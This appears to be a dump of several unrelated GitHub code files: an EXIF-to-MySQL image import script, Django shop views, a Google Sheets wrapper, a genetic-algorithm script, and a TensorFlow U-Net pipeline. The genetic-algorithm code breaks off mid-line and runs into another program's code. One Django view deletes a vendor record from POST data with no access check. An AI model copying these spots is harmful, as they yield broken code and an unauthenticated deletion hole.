for s in d:\n vals = {}\n for v in d[s]:\n tag = v.split(' ')\n if len(tag) > 1:\n tag = tag[1]\n else:\n tag = tag[0]\n vals[tag] = d[s][v]\n values.append(vals)\n return values\n\n\n# Cleans out files and moves them to a given directory, deleting empty dir.\ndef clean_dir(out, files):\n for f in files:\n folder = os.path.basename(os.path.dirname(f))\n out_folder = os.path.join(out, folder)\n file = os.path.join(out_folder, os.path.basename(f))\n if not os.path.exists(out_folder):\n os.mkdir(out_folder)\n os.rename(f, file)\n cur_folder = os.path.split(f)[0]\n if(cur_folder != in_dir):\n try:\n os.rmdir(cur_folder)\n except OSError:\n pass\n\n\nif __name__ == '__main__':\n __spec__ = None\n # read cfg for host and database to connect to\n with open(\"db.cfg\") as f:\n host = f.readline().strip('\\n')\n database = f.readline().strip('\\n')\n\n # read cfg for credentials (username and password to DB)\n # TODO: decrypt using a key found in another file(?)\n with 
open(\"cred.cfg\") as f:\n usr = f.readline().strip('\\n')\n pwd = f.readline().strip('\\n')\n\n # variable to be injected\n inj = []\n # failure injectable\n fail = []\n # the columsn matching the DB specification\n # and format (to be inserted into)\n columns = (\"CameraNumber,Orientation,\"\n \"XResolution,YResolution,\"\n \"ResolutionUnit,Software,TimeTaken,\"\n \"ExposureTime,FNumber,ExposureProgram,\"\n \"ISOSpeedRatings,ExifVersion,\"\n \"ComponentsConfiguration,\"\n \"CompressedBitsPerPixel,\"\n \"ShutterSpeedValue,ApertureValue,\"\n \"ExposureBiasValue,\"\n \"MaxApertureValue,MeteringMode,Flash,\"\n \"Checksum,Data\")\n # exif tags that are returned (in this order)\n tags = (\"ImageDescription,Orientation,\"\n \"XResolution,YResolution,\"\n \"ResolutionUnit,Software,DateTime,\"\n \"ExposureTime,FNumber,ExposureProgram,\"\n \"ISOSpeedRatings,ExifVersion,\"\n \"ComponentsConfiguration,\"\n \"CompressedBitsPerPixel,\"\n \"ShutterSpeedValue,ApertureValue,\"\n \"ExposureBiasValue,\"\n \"MaxApertureValue,MeteringMode,Flash,\"\n \"Checksum,Data\")\n # statement for image table insertion\n statement = (f\"insert into image ({columns}) values \")\n # build upon this to use for image insert ... (%s, %s,...),\n query = ''\n # statement and query for inserting into log table\n log = (\"insert into importrun (Start, End, Attempted) values (%s, %s, %s);\")\n # statement for inserting into failure table\n failure = (\"insert into failure (Start, Checksum, Note) values \")\n # build upon this to use for failure insert ... (%s, %s,...)\n fail_query = ''\n\n # tags that should be taken from exif\n # (exactly as they are found from exifread)\n tag_set = (\"Image ImageDescription, Image Orientation, \"\n \"Image XResolution, Image YResolution, \"\n \"Image ResolutionUnit, Image Software, \"\n \"Image DateTime, EXIF ExposureTime, EXIF FNumber, \"\n \"EXIF ExposureProgram, EXIF ISOSpeedRatings, \"\n \"EXIF ExifVersion, EXIF ComponentsConfiguration, \"\n \"EXIF CompressedBitsPerPixel, \"\n \"EXIF ShutterSpeedValue, \"\n \"EXIF ApertureValue, EXIF ExposureBiasValue, \"\n \"EXIF MaxApertureValue, \"\n \"EXIF MeteringMode, EXIF Flash\")\n\n # from the single-value dict, get the total and metatags pair\n # then clean the data\n (total, meta), = m.get_meta(in_dir, tag_set, q_dir, cpus).items()\n values = cleaned_meta(meta)\n\n # list of the exif tags\n cols = tags.split(',')\n # current buffer size\n i = 0\n # count the number of times the buffer is dumped erroneously\n buffer_dumps = 0\n # the types to be converted and fitted to the right formats\n timestamps = [\"DateTime\"]\n ints = [\"ImageDescription\", \"XResolution\", \"YResolution\"]\n floats = [\"ExposureTime\",\n \"FNumber\",\n \"CompressedBitsPerPixel\",\n \"ShutterSpeedValue\",\n \"MaxApertureValue\"]\n # files that may be moved to out dir or quarantine dir\n # depends on if they are successful in insert\n files_pending = []\n # files to be moved to d_dir\n deletes = []\n # files to be moved to quarantine\n quarantines = []\n # performance timing\n start = perf_counter()\n # epoch timing for log\n l_start = time.time()\n # connect and query\n with con.MYSQL(host, database, port, usr, pwd) as db:\n # for every row of exif\n for row in values:\n # row of exif data, this is what will be inserted\n # made of converted values\n fRow = []\n try:\n # for every exif tag that is in the returned meta dict\n for c in cols:\n # do conversions\n if row.get(c) is None or row[c].strip(' ') == '':\n row[c] = None\n elif c in timestamps:\n d = 
datetime.strptime(row[c], \"%Y:%m:%d %H:%M:%S\")\n ts = int(time.mktime(d.timetuple()))\n row[c] = ts\n elif c in ints:\n row[c] = int(row[c])\n elif c in floats:\n if '/' in row[c]:\n nums = row[c].split('/')\n row[c] = float(nums[0])/float(nums[1])\n else:\n row[c] = float(row[c])\n fRow.append(row[c])\n # on value conversion failure, put in quarantine and log failure\n except Exception as e:\n quarantines.append(row[\"Path\"])\n fail.extend([l_start, row[\"Checksum\"], str(e)[0:800]])\n fail_query += '(' + '%s,'*2 + '%s),'\n continue\n # buffer is added to if this point reached\n i = i + 1\n # add current file to pending\n files_pending.append(row[\"Path\"])\n row = fRow\n # new image to insert, append to query\n query += '(' + '%s,'*(len(cols)-1) + '%s),'\n # new image to insert, append to value injectable\n inj.extend(row)\n # when buffer is full, attempt insert\n if i >= buffer_size:\n # attempt query\n query = statement + query[:-1] + ';'\n r = db.query(query, inj)\n # on success, add file to be moved to deleted folder\n # reset pending files\n if not db.errors:\n deletes.extend(files_pending)\n files_pending = []\n # on failure\n else:\n # reset general query errors\n db.errors = ''\n # buffer dumped, increment\n buffer_dumps += 1\n # break up the injectables list into lists corresponding to files\n # each sublist length matches the number of columns\n data = [inj[x:x+len(cols)] for x in range(0, len(inj), len(cols))]\n # single-insert query\n query = statement + '(' + '%s,'*(len(cols)-1) + '%s);'\n # perform single-inserts using sublists\n # insert failures and unmasked error codes\n for d, j in zip(data, files_pending):\n inj = d\n r = db.query(query, inj)\n if db.errors:\n quarantines.append(j)\n fail.extend([l_start, d[20], str(db.errors)[0:800]])\n fail_query += '(' + '%s,'*2 + '%s),'\n db.errors = ''\n # buffer is reset\n i = 0\n # injectables is reset\n inj = []\n # query is reset\n query = ''\n # reached end of files, buffer not empty, attempt to insert\n # same process as above\n if i != 0:\n query = statement + query[:-1] + \";\"\n r = db.query(query, inj)\n if not db.errors:\n deletes.extend(files_pending)\n files_pending = []\n else:\n db.errors = ''\n buffer_dumps += 1\n data = [inj[x:x+len(cols)] for x in range(0, len(inj), len(cols))]\n query = statement + '(' + '%s,'*(len(cols)-1) + '%s);'\n for d, j in zip(data, files_pending):\n inj = d\n r = db.query(query, inj)\n if db.errors:\n quarantines.append(j)\n fail.extend([l_start, d[20], str(db.errors)[0:800]])\n fail_query += '(' + '%s,'*2 + '%s),'\n db.errors = ''\n query = ''\n # done inserting images, record performance end\n stop = perf_counter()\n # if images have actually been processed, insert into failure, performance\n if total > 0:\n l_stop = time.time()\n db.query(log, [l_start, l_stop, total])\n if fail:\n fail_query = failure + fail_query[:-1] + \";\"\n r = db.query(fail_query, fail)\n\n r = db.query(\"insert into performance (Start, Time, Buffer, Attempted, BufferDumps) values (%s, %s, %s, %s, %s);\", [l_start, round(stop-start, 6), buffer_size, total, buffer_dumps])\n #clean_dir(d_dir, deletes)\n #clean_dir(q_dir, quarantines)\n","repo_name":"jsksjs/flow_insert","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":12083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"43784905011","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect, HttpResponse,JsonResponse\nfrom 
administrator.models import Category, SubCategory, VendorPost, Brand, FeaturedProducts, ClassifiedAds\nfrom account.models import Vendor\nfrom django.db.models import Q\n\n\n\ndef index(request):\n\tcategory = Category.objects.all()\n\tvendor = Vendor.objects.all()\n\tcontext={'category':category, 'vendor':vendor}\n\treturn render(request, 'index.html', context)\n\ndef allcategories(request):\n\tcategory = Category.objects.all()\n\tsubcategory = SubCategory.objects.all()\n\tcontext = {'category':category, 'subcategory':subcategory}\n\treturn render(request, 'allcategories.html', context)\n\ndef category(request, id):\n\tsubcategory =SubCategory.objects.all()\n\tcategory = Category.objects.all()\n\tvendor_name = Vendor.objects.all()\n\tmaincategory = Category.objects.get(id=id)\n\tfilter_category = Category.objects.get(id=id)\n\tqs = VendorPost.objects.filter(category=filter_category)\n\tdetails = VendorPost.objects.filter(category=maincategory)\n\tcontext = {'category':category, 'subcategory':subcategory, 'qs':qs, 'details':details}\n\treturn render(request, 'category.html', context )\n\ndef details(request, id):\n\tpost_pk = request.POST.get(\"post_pk\")\n\tpost = Vendor.objects.get(id_user=post_pk)\n\tpost.delete()\n\t# print(post.user)\n\treturn JsonResponse({\"msg\":\"deleted\"})\n\n\n\ndef featuredProducts(request):\n\tcategory = Category.objects.all()\n\tsubcategory = SubCategory.objects.all()\n\tbrand = Brand.objects.all()\n\tfeatured = FeaturedProducts.objects.all()\n\treturn render(request, 'featuredproducts.html', {'category':category, 'subcategory':subcategory, 'brand':brand, 'featured':featured})\n\ndef todays_deal(request):\n\treturn render(request, 'todays_deal.html')\n\ndef bundledProducts(request):\n\treturn render(request, 'bundledProducts.html')\n\ndef classified_ads(request):\n\tclassified_ads = ClassifiedAds.objects.all()\n\treturn render(request, 'classified_ads.html')\n\ndef allbrands(request):\n\tcategory = Category.objects.all()\n\tbrand = Brand.objects.all()\n\tcontext={'category':category, 'brand':brand}\n\treturn render(request, 'allbrands.html', context)\n\ndef allvendors(request):\n\treturn render(request, 'allvendors.html')\n\ndef all_vendors_location(request):\n\treturn render(request, 'all_vendors_location.html')\n\ndef blog(request):\n\treturn render(request, 'blog.html')\n\ndef contact_us(request):\n\treturn render(request, 'contact_us.html')\n\n\ndef filter_items(request):\n\tsubcategory =SubCategory.objects.all()\n\tcategory = Category.objects.all()\n\tsearch = request.POST.get('search')\n\tcategory1 = request.POST.get('category')\n\tservice = request.POST.get('service')\n\tqueryset = VendorPost.objects.none() # default, so the context below never hits an unbound name\n\tif service == 'Vendor':\n\t\tsearchcategory = Vendor\n\t\tqueryset = Vendor.objects.filter(Q(company_name=search) | Q(business_name=search))\n\tif category1 == 'All Categories':\n\t\tqueryset = VendorPost.objects.filter(Q(Product_title=search))\n\n\n\tif service == \"Products/Services\":\n\t\tsearchcategory = VendorPost\n\t\tqueryset = VendorPost.objects.filter(Q(Product_title=search) | Q(category=category1))\n\t\n\tcontext = {'category':category, 'subcategory':subcategory, 'queryset':queryset } \n\treturn render(request, 'filter_search.html', context)\n\t\n
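\n# Note: Q objects must be combined with the bitwise operators '|' (OR) and\n# '&' (AND); Python's 'or'/'and' keywords short-circuit and silently keep only\n# one of the two Q objects. A minimal sketch using the models above:\n#\n# matches = Vendor.objects.filter(\n# Q(company_name=search) | Q(business_name=search)\n# )\n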
\ndef other_filtered_items(request):\n\tsubcategory =SubCategory.objects.all()\n\tcategory = Category.objects.all()\n\tminprice = request.POST.get('minprice')\n\tmaxprice = request.POST.get('maxprice')\n\tsearch = request.POST.get('search')\n\tcategory1 = request.POST.get('category')\n\tsubcategory1 = request.POST.get('subcategory')\n\tif category1 == 'ALL CATEGORIES':\n\t\tqueryset = VendorPost.objects.filter(Q(Product_title=search))\n\telse:\t\t\n\t\tcategory_qs = Category.objects.get(name=category1)\t\n\t\tbrand1 = request.POST.get('brand')\t\n\t\tbrand_qs = Brand.objects.get(name=brand1)\n\t\tsubcategory_qs = SubCategory.objects.get(subcategory=subcategory1)\n\t\tqueryset = VendorPost.objects.filter(Q(Product_title=search) & Q(category=category_qs) & Q(subcategory=subcategory_qs) & Q(brand=brand_qs))\n\tcontext = {'queryset':queryset, 'minprice':minprice, 'maxprice':maxprice, 'subcategory':subcategory, 'category':category}\n\treturn render(request, 'other_filtered_products.html', context)\n\n","repo_name":"budescode/ecommerce2","sub_path":"project/index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"21695593248","text":"import os.path\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\n\n\nclass Sheets:\n def __init__(self, range):\n self.spreadsheetid = '178VffXNLhO9ft3XdHLS8c-SHzprySG5LNl8dCWP-ozw'\n self.range = range\n self.scopes = ['https://www.googleapis.com/auth/spreadsheets']\n self.creds = None\n if os.path.exists('sheets/token.json'):\n self.creds = Credentials.from_authorized_user_file('sheets/token.json', self.scopes)\n if not self.creds or not self.creds.valid:\n if self.creds and self.creds.expired and self.creds.refresh_token:\n self.creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'client_secret_304336328785-4ebvdd4uue0tevpttvbgjiln6mrfeqb1.apps.googleusercontent.com.json',\n self.scopes)\n self.creds = flow.run_local_server(port=0)\n with open('sheets/token.json', 'w') as token:\n token.write(self.creds.to_json())\n\n def Append(self, array):\n try:\n value_input_option = 'RAW'\n values = array\n body = {\n 'values': values\n }\n service = build('sheets', 'v4', credentials=self.creds)\n result = service.spreadsheets().values().update(\n spreadsheetId=self.spreadsheetid, range=self.range,\n valueInputOption=value_input_option, body=body).execute()\n\n except HttpError as err:\n print(err)\n\n def Get(self):\n try:\n service = build('sheets', 'v4', credentials=self.creds)\n sheet = service.spreadsheets()\n result = sheet.values().get(spreadsheetId=self.spreadsheetid,\n range=self.range).execute()\n return result.get('values', [])\n except HttpError as err:\n print(err)\n\n def Color(self, row, color):\n service = build('sheets', 'v4', credentials=self.creds)\n rng_id = {'Лаунчпады Обновляемые': 438461124, 'Голосовалки Обновляемые': 1475704027, 'NFT Обновляемые': 478055467}\n sheet_id = rng_id[self.range]\n row1 = row - 1\n row2 = row\n body = {\n \"requests\": [\n {\n \"updateCells\": {\n \"range\": {\n \"sheetId\": sheet_id,\n \"startRowIndex\": 5,\n \"endRowIndex\": 6,\n \"startColumnIndex\": row1,\n \"endColumnIndex\": row2\n },\n \"rows\": [\n {\n \"values\": [\n {\n \"userEnteredFormat\": {\n \"backgroundColor\": {\n color: 1\n }\n }\n }\n ]\n }\n ],\n \"fields\": \"userEnteredFormat.backgroundColor\"\n }\n }\n ]\n }\n res = service.spreadsheets().batchUpdate(spreadsheetId=self.spreadsheetid, 
body=body).execute()\n","repo_name":"bucin98/Email_sender","sub_path":"sheets/sheets.py","file_name":"sheets.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"27585843271","text":"#******************************************\n\"\"\"\nInstituto Politecnico Nacional\nEscuela superior de fisica y Matematicas\nlicenciatura de Matematica algoritmica\nFundamentos de inteligencia Artificial\nEditor: Ortiz Ortiz Bosco\ntitulo: Algoritmo Genetico; Maximo de una \nfuncion\n\"\"\"\n#------------------------------------------\n# Modulos a importar\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math as mt\n#------------------------------------------\n# funcion de muchos maximos\ndef f_x(x):\n return -(0.1+(1-x)**2-0.1*mt.cos(6*mt.pi*(1-x)))+2\n#------------------------------------------\n# Lista decimal\ndef listToDecimal(num):\n decimal:np.float64=0\n for i in range(len(num)):\n decimal+=num[i]*10**(-i)\n return decimal\n#------------------------------------------\n# Mutaciones\ndef mutar(individuos,prob,pool):\n for j in range(len(individuos)):\n mutar_individuo=individuos[j]\n if np.random.random() 0:\n\targ = list(map(int, input().split()))\n\tn, k = arg[0], arg[1]\n\tset_s = set(list(map(int, input().split())))\n\tprint(list(universe - set_s)[k])\n\ttestcases -= 1","repo_name":"karanm97/codingProblems","sub_path":"mex.py","file_name":"mex.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"40610223496","text":"#1\r\nMODEL_NAME = \"unet\"\r\nIMG_MIN_SIZE=128\r\nIMG_CHANNELS=3\r\n\r\nSTEPS_IN_TRAINING = 1\r\nSTEPS_IN_EVALUATION = 1\r\n\r\nUSE_WEIGHTS_N_EROSION = False\r\n\r\nfrom pathlib import Path\r\n# TRAIN_PATH = Path('D:\\\\UNET in Tensorflow\\\\Unet_Tensor\\\\dataset\\\\training')\r\nTRAIN_PATH = Path('D:\\\\UNET\\\\DataGene\\\\nf_datatraining')\r\nTEST_PATH = Path('D:\\\\UNET in Tensorflow\\\\Unet_Tensor\\\\dataset\\\\testing')\r\n\r\n#2\r\nimport os\r\nimport sys\r\nimport random\r\nimport warnings\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom skimage import io, transform, morphology, filters\r\nfrom scipy import ndimage\r\nfrom PIL import Image\r\nimport tensorflow as tf\r\nwarnings.filterwarnings('ignore', category=UserWarning, module='skimage')\r\n\r\n#3\r\nfrom collections import namedtuple\r\nimport hashlib\r\n#Instead of relying on random seeds to keep validation set separate from training\r\n#Using SHA1 to convert a file name to a random number between 1 and 100.\r\ndef filename_to_uniform_number(filepath, MAX_ITEMS_PER_CLASS=2 ** 27 - 1 ):\r\n hash_name = filepath.name.split('_nohash_')[0]\r\n hash_name_hashed = hashlib.sha1(hash_name.encode(\"utf-8\")).hexdigest()\r\n return ((int(hash_name_hashed, 16) % (MAX_ITEMS_PER_CLASS + 1)) *\r\n (1 / MAX_ITEMS_PER_CLASS))\r\n\r\ndef which_set(fn, validation_size=0.1666):\r\n if filename_to_uniform_number(fn) < validation_size:\r\n return tf.estimator.ModeKeys.EVAL\r\n return tf.estimator.ModeKeys.TRAIN\r\n\r\n#4\r\nTE = namedtuple('TE', [tf.estimator.ModeKeys.TRAIN, tf.estimator.ModeKeys.EVAL])\r\n\r\npaths = TE([],[])\r\n\r\n#Set validation set percentage\r\nfor x in TRAIN_PATH.glob(\"*\"):\r\n getattr(paths, which_set(x, 0.1666)).append(x)\r\n\r\nprint(\"Validation set percentage:\", len(paths.eval)/(len(paths.train)+len(paths.eval)))\r\n\r\n#5\r\n#Slice function\r\n# slice(a) -> 
get the items from position 0 to position a-1\r\n# slice(a,b) -> get the items from position a to position b-1\r\n# slice(a,b,c) -> get the items from positon a to position b-1 with the differences btw 2 consecutive items is c\r\n\r\nIMG = (slice(None), slice(None), slice(0,3))\r\nMASK = (slice(None), slice(None), slice(3,4))\r\nWEIGHTS = (slice(None), slice(None), slice(4,5))\r\n\r\n#6\r\ndef show_sample(sample):\r\n if type (sample) == tf.Tensor:\r\n print(\"Unable to display tensor that was not executed, run_in_sess(sample)\", sample)\r\n return\r\n images = [sample[IMG], sample[MASK], sample[WEIGHTS]]\r\n show_image_list(images)\r\n\r\ndef show_image_list(images):\r\n if len(images) == 1:\r\n im = plt.imshow(np.squeeze(images[0]))\r\n else:\r\n fig, axs = plt.subplots(1, len(images), figsize=(20,20))\r\n for img, ax in zip(images, axs):\r\n im = ax.imshow(np.squeeze(img))\r\n fig.colorbar(im, ax=axs.ravel().tolist(), shrink=0.2)\r\n plt.show()\r\n\r\n#7\r\ndef calculate_unet_background_weight(merged_mask, masks, w0=10, q=5,):\r\n weight = np.zeros(merged_mask.shape)\r\n # calculate weight for important pixels\r\n distances = np.array([ndimage.distance_transform_edt(m==0) for m in masks])\r\n shortest_dist = np.sort(distances, axis=0)\r\n # distance to the border of the nearest cell\r\n d1 = shortest_dist[0]\r\n # distance to the border of the second nearest cell\r\n d2 = shortest_dist[1] if len(shortest_dist) > 1 else np.zeros(d1.shape)\r\n\r\n weight = w0 * np.exp(-(d1+d2)**2/(2*q**2)).astype(np.float32)\r\n weight = 1 + (merged_mask == 0) * weight\r\n return weight\r\n\r\ndef binary_erosion_tf(mask):\r\n def binary_erosion(img):\r\n img = ndimage.morphology.binary_erosion((img > 0 ), border_value=1).astype(np.uint8)\r\n return img\r\n return tf.py_func(binary_erosion, [mask], tf.uint8)\r\n\r\ndef calculate_weights_tf(merged_mask, masks):\r\n return tf.py_func(calculate_unet_background_weight, [merged_mask, masks], tf.float32)\r\n\r\n#8\r\n#Load sample\r\ndef load_mask_tf(sample_path, use_weights_n_erosion=USE_WEIGHTS_N_EROSION):\r\n mask_ds = (tf.data.Dataset.list_files(sample_path+\"/masks*/*.png\")\r\n .map(lambda x: tf.image.decode_image(tf.read_file(x), channels=1), num_parallel_calls=4))\r\n\r\n if use_weights_n_erosion:\r\n mask_ds = mask_ds.map(binary_erosion_tf)\r\n\r\n masks = tf.contrib.data.get_single_element(mask_ds.batch(1024))\r\n masks = tf.clip_by_value(tf.cast(masks, dtype=tf.float32), 0, 1) # convert to binary mask (it was 0, 255)\r\n colors = tf.cast(tf.range(1, tf.shape(masks)[0]+1), dtype=tf.float32)\r\n colors = tf.reshape(colors, shape=[-1,1,1,1])\r\n merged_mask = tf.reduce_max(masks * colors, axis=0)\r\n\r\n if use_weights_n_erosion:\r\n weights = calculate_weights_tf(merged_mask, masks)\r\n else:\r\n weights = tf.ones_like(merged_mask)\r\n\r\n return merged_mask, weights\r\n\r\ndef load_sample_tf(sample_path, load_mask=True, use_weights_n_erosion=USE_WEIGHTS_N_EROSION):\r\n image = tf.contrib.data.get_single_element(tf.data.Dataset.list_files(sample_path+\"/images/*.png\")\r\n .map(lambda x: tf.image.decode_image(tf.read_file(x), channels=3)))\r\n image = tf.cast(image, dtype=tf.float32)\r\n if load_mask:\r\n merged_mask, weights = load_mask_tf(sample_path, use_weights_n_erosion=use_weights_n_erosion)\r\n sample = tf.concat([image, merged_mask, weights], axis=2)\r\n else:\r\n img_shape = tf.shape(image)\r\n mask_shape = [img_shape[0],img_shape[1],1]\r\n sample = tf.concat([image, tf.zeros(mask_shape), tf.ones(mask_shape)], axis=2)\r\n\r\n return 
sample\r\n\r\ndef run_in_sess(fn, *args, **kwargs):\r\n with tf.Graph().as_default():\r\n x = fn(*args, **kwargs)\r\n init = (tf.global_variables_initializer(), tf.local_variables_initializer())\r\n with tf.Session() as sess:\r\n sess.run(init)\r\n ret = sess.run(x)\r\n return ret\r\n\r\ndef load_sample(sample_path, load_mask=True, use_weights_n_erosion=USE_WEIGHTS_N_EROSION):\r\n return run_in_sess(load_sample_tf, str(sample_path), load_mask, use_weights_n_erosion)\r\n\r\nsample = load_sample(paths.train[350], use_weights_n_erosion=True)\r\nprint(\"A slow version of load_sample that calculate weights and erosion, normally the weigts are set to an array of ones\")\r\nprint(\"Sample size:\", sample.shape)\r\n# show_sample(sample)\r\nassert sample.dtype == 'float32'\r\nassert sample.shape[2] == 5, sample.shape[2]\r\nprint(\"Maximum weight set\", np.max(sample[WEIGHTS]))\r\n\r\n#9\r\n#Reduce size of Original Image to fit the data scale for training\r\ndef pad_to_min_size_tf(img, batch=False):\r\n \"\"\"Pads image so that it's height and width is divisable by IMG_MIN_SIZE\r\n\r\n It handles both single images or batches of images.\r\n \"\"\"\r\n if batch:\r\n print (\"Batch mode\")\r\n img_shape=slice(1,3)\r\n samples_dim = [[0,0]]\r\n else:\r\n img_shape=slice(0,2)\r\n samples_dim = []\r\n\r\n shape = tf.shape(img)\r\n desired_shape = tf.cast(tf.ceil(tf.cast(shape[img_shape], dtype=tf.float32) / IMG_MIN_SIZE) * IMG_MIN_SIZE, dtype=tf.int32)\r\n pad = (desired_shape - shape[img_shape])\r\n padding = samples_dim+[[0, pad[0]], [0, pad[1]], [0, 0]]\r\n return tf.pad(img, padding, mode='SYMMETRIC', name='test'), shape\r\n\r\n# sample2, orig_shape = run_in_sess(pad_to_min_size_tf, np.expand_dims(sample,0), batch=False)\r\nsample2, orig_shape = run_in_sess(pad_to_min_size_tf, sample, batch=False)\r\nprint(\"Orignal shape:\", sample.shape, \"new padded shape:\", sample2.shape)\r\n# show_sample(sample2)\r\n\r\ndef random_crop_tf(sample):\r\n return tf.random_crop(sample, size=[IMG_MIN_SIZE, IMG_MIN_SIZE, tf.shape(sample)[2]])\r\n\r\nsample2 = run_in_sess(random_crop_tf, sample)\r\nprint(\"Croping\", sample[IMG].shape, \"to\", sample2[IMG].shape)\r\nprint(\"Orignal\")\r\n# show_sample(sample)\r\nprint(\"Cropped version\")\r\n# show_sample(sample2)\r\n\r\ndef cut_to_many_tf(sample, return_dataset=True):\r\n \"\"\"Cut a padded sample to many images of size IMG_MIN_SIZExIMG_MIN_SIZE.\r\n\r\n Used for validation set where we don't want to use random_crop.\r\n \"\"\"\r\n even_sample, orig_size = pad_to_min_size_tf(sample)\r\n shape = tf.shape(even_sample)\r\n\r\n ch = shape[2]\r\n y = shape[1]\r\n split_y = tf.reshape(even_sample, [-1, IMG_MIN_SIZE, y, ch])\r\n split_num = tf.cast(tf.shape(even_sample)[0]//IMG_MIN_SIZE, dtype=tf.int64)\r\n\r\n def split_in_x(i):\r\n\r\n y0 = tf.cast(i*IMG_MIN_SIZE, dtype=tf.int32)\r\n y1 = tf.cast((i+1)*IMG_MIN_SIZE, dtype=tf.int32)\r\n\r\n img = split_y[:, :, y0:y1, :]\r\n return tf.data.Dataset.from_tensor_slices(img)\r\n\r\n ds = tf.data.Dataset.range(split_num).flat_map(split_in_x)\r\n if return_dataset:\r\n return ds\r\n return tf.contrib.data.get_single_element(ds.batch(1024))\r\n\r\n\r\nnew_samples = run_in_sess(cut_to_many_tf, sample, False)\r\nprint(\"3 first samples extracted from the large sample\", sample.shape)\r\nprint(\"Total amount of samples extracted:\",len(new_samples))\r\n# for s in new_samples[:3]:\r\n# show_sample(s)\r\n\r\n#Making input pipline\r\ndef input_fn(sample_paths, batch_size=1, shuffle=False, num_epochs=1, take=None, load_labels=True):\r\n # 
Estimator API except a different representation of samples, as tuple of dicts one for features one for labels.\r\n # so we have this small conversion utility\r\n def sample_to_features_n_labels(sample):\r\n return {'image':sample[IMG]}, {'mask': sample[MASK], 'weights': sample[WEIGHTS]}\r\n\r\n sample_paths_tensor = tf.constant(list(map(str, sample_paths)), dtype=tf.string)\r\n\r\n def input_fn():\r\n dataset = tf.data.Dataset.from_tensor_slices(sample_paths_tensor)\r\n\r\n # As you see Dataset.shuffle except a buffer that can hold all samples to correctly shuffle them.\r\n # Since we are starting from paths the buffer does not have to be that large.\r\n if shuffle:\r\n dataset = dataset.shuffle(buffer_size=len(sample_paths))\r\n if take is not None:\r\n dataset = dataset.take(take)\r\n dataset = (dataset\r\n .map(lambda x: load_sample_tf(x, load_mask=load_labels), num_parallel_calls=4)\r\n .cache()) # this does not work that well if the evaluation is being done on the same GPU as training.\r\n\r\n if shuffle:\r\n dataset = dataset.map(random_crop_tf)\r\n else:\r\n dataset = dataset.flat_map(cut_to_many_tf)\r\n\r\n dataset = (dataset.map(sample_to_features_n_labels)\r\n .repeat(num_epochs)\r\n .batch(batch_size)\r\n .prefetch(1)\r\n )\r\n\r\n\r\n\r\n iterator = dataset.make_one_shot_iterator()\r\n # `features` is a dictionary in which each value is a batch of values for\r\n # that feature; `labels` is a batch of labels.\r\n features, labels = iterator.get_next()\r\n return features, labels\r\n return input_fn\r\n\r\nimport time\r\nstart_time = time.time()\r\n\r\nwith tf.Graph().as_default():\r\n it = input_fn(paths.eval, batch_size=1024)()\r\n with tf.Session() as s:\r\n all_eval_samples = (s.run((it)))\r\n print(\"First batch fetched, now the ds should stop\")\r\n try:\r\n nothing = (s.run((it)))\r\n except tf.errors.OutOfRangeError:\r\n print(\"The iterator correctly let us know that it is empty.\")\r\n\r\nimages_loaded = all_eval_samples[0]['image'].shape[0]\r\ntotal_time = (time.time() - start_time)\r\nprint(\"Total execution time %s sec, performance %s samples / sec\" % (total_time, images_loaded/total_time))\r\n\r\n#Small function that let's us display results from input_fn\r\ndef show_features_n_labels(features, labels, max_samples=1):\r\n features = np.array([i for i in features.values()])\r\n labels = np.array([i for i in labels.values()])\r\n\r\n if len(features.shape) not in [4,5]:\r\n raise AttributeError(\"Wrong shape of images\", features.shape)\r\n\r\n if len(features.shape) == 4:\r\n features = np.expand_dims(features)\r\n labels = np.expand_dims(labels)\r\n\r\n ## TODO: make it more efficient at trimming the batch\r\n samples_to_show = min(max_samples, features.shape[1])\r\n for sample_idx in range(0, samples_to_show):\r\n sample = [f for f in features[:,sample_idx,:,:,:]] + [l for l in labels[:,sample_idx,:,:,:]]\r\n # show_image_list(sample)\r\n\r\nshow_features_n_labels(*all_eval_samples, max_samples=2)\r\n\r\n#The Model written in Tensorflow\r\nfrom tensorflow.python.ops import array_ops\r\n\r\ndef conv2d_3x3(filters):\r\n return tf.layers.Conv2D(filters, kernel_size=(3,3), activation=tf.nn.relu, padding='same')\r\n\r\ndef max_pool():\r\n return tf.layers.MaxPooling2D((2,2), strides=2, padding='same')\r\n\r\ndef conv2d_transpose_2x2(filters):\r\n return tf.layers.Conv2DTranspose(filters, kernel_size=(2, 2), strides=(2, 2), padding='same')\r\n\r\ndef concatenate(branches):\r\n return array_ops.concat(branches, 3)\r\n\r\ndef get_model(features, mode, params):\r\n x = 
